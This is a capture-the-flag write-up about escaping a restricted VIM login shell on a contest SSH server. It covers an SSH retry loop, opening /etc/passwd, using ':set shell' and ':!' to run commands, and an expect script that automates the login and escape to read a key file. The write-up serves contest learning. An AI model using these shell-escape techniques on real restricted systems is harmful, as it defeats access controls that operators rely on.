Description: firstname.lastname@example.org:6000 sheep go baaAaaA
One could simply SSH to the server with:
ssh -p 6000 email@example.com # and use password baaAaaAHowever, it appeared that the server was overloaded and most of the time SSH did not work. The solution is to connect to SSH continuously until it works with some shell scripting:
while true; do ssh -p6000 firstname.lastname@example.org doneOnce connected, you get a black screen with nothing but rapidly discover you are in VIM text editor.
About the black screen and nothing displayed, you could either:
- under Windows with PuTTY uncheck Window/Colours options
- select text and copy/paste it elsewhere, the content is here
- write some expect to automate SSH connection and sending of commands and be able to pipe the output of SSH
A few useful VIM commands:
:q! => quit :o => open a file :!<command> => run command *in default shell*
We tried to list files with:
:!lsbut it did not work. So we opened /etc/passwd with:
:o /etc/passwdand discovered that the default shell of sheep user was /usr/bin/vim. Simply change it with:
:set shell /bin/bash
Then we were able to list files:
:!lsand view the key file:
-rw-r-----. 1 root sheepy 13 May 22 00:01 keyJust open it with:
:o keyand you get the key: SHis4pansies.
At the same time, I was doing some expect & shell to get the key. Expect comes very handy when you want to automate things or when you want to get the output of an interactive program such as ssh. Let me show you this solution as a small introduction to expect.
The expect script:
$ cat ssh-cmd.expect #!/usr/bin/expect -f set cmd [lindex $argv 0] spawn ssh -p 6000 email@example.com expect "*?assword:*" send -- "baaAaaA\r" sleep 1 send -- ":set shell=/bin/sh\r" send -- ":!$cmd\r" send -- ":q!\r" expect eof
The shell script that runs expect and filters the output for us:
$ cat ssh-cmd.sh #!/bin/sh # remove these annoying [ terminal color codes ./ssh-cmd.expect "$*" | strings | grep -v '^\['
$ ./ssh-cmd.sh ls -l spawn ssh -p 6000 firstname.lastname@example.org email@example.com's password: Last login: Sat May 22 05:34:03 2010 from x total 4 -rw-r-----. 1 root sheepy 13 May 22 00:01 key Press ENTER or type command to continue Connection to pwn21.ddtek.biz closed.
Cat the key:
$ ./ssh-cmd.sh cat key spawn ssh -p 6000 firstname.lastname@example.org email@example.com's password: Last login: Sat May 22 05:34:18 2010 from x SHis4pansies Press ENTER or type command to continue Connection to pwn21.ddtek.biz closed.